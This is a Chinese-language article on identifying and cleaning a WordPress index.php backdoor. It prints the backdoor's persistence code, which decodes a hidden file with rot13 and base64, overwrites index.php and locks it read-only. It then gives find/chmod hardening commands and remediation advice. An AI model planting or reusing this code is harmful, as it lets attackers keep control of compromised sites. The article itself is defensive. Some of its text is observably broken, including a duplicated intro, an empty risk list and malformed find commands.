本文详解如何识别并清除 wordpress 站点中常见的 index.php 后门代码(含 str_rot13 + base64 混淆逻辑),分析其行为特征,提供紧急响应步骤、手动清理方法及长期安全加固策略。
本文详解如何识别并清除 wordpress 站点中常见的 index.php 后门代码(含 str_rot13 + base64 混淆逻辑),分析其行为特征,提供紧急响应步骤、手动清理方法及长期安全加固策略。
你看到的重复出现的 PHP 代码片段并非正常程序逻辑,而是一段典型的恶意后门脚本,已被广泛用于 WordPress 站点劫持与持久化控制。该代码会定期检查当前 index.php 文件内容是否被修改,并强行将其覆盖为攻击者预设的混淆内容(存储在 {index_hide} 文件中),从而实现自动恢复恶意代码、绕过人工修复的目的。
$i_p = "index.php";$index = file_get_contents($i_p);$path = "{index_hide}"; // 注意:这不是合法路径,而是攻击者伪造的隐藏文件标识if (file_exists($path)) { $index_hide = file_get_contents($path); // 双重 str_rot13 + base64 解码 —— 典型混淆手法 $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if (md5($index) !== md5($index_hide)) { @chmod($i_p, 0644); // 临时提升写权限 @file_put_contents($i_p, $index_hide); // 强制覆写 index.php @chmod($i_p, 0444); // 锁定为只读,防人工编辑 }}
⚠️ 关键风险点:
find /path/to/wordpress -type f -exec chmod 644 {} ;find /path/to/wordpress -type d -exec chmod 755 {} ;chmod 444 wp-config.php && chmod 444 .htaccess
? 重要提醒:该后门通常源于弱密码、未更新的插件(如旧版 WP GDPR Compliance、Slider Revolution)、或被黑的第三方主题。切勿依赖“仅删后门代码”——攻击者大概率已在数据库、其他 PHP 文件或 cron 任务中埋设多层后门。完整重装 + 密码轮换 + 插件溯源才是唯一可靠方案。
安全不是一次性任务,而是持续的过程。每一次更新、每一次权限审查、每一次日志复盘,都是对网站生命力的守护。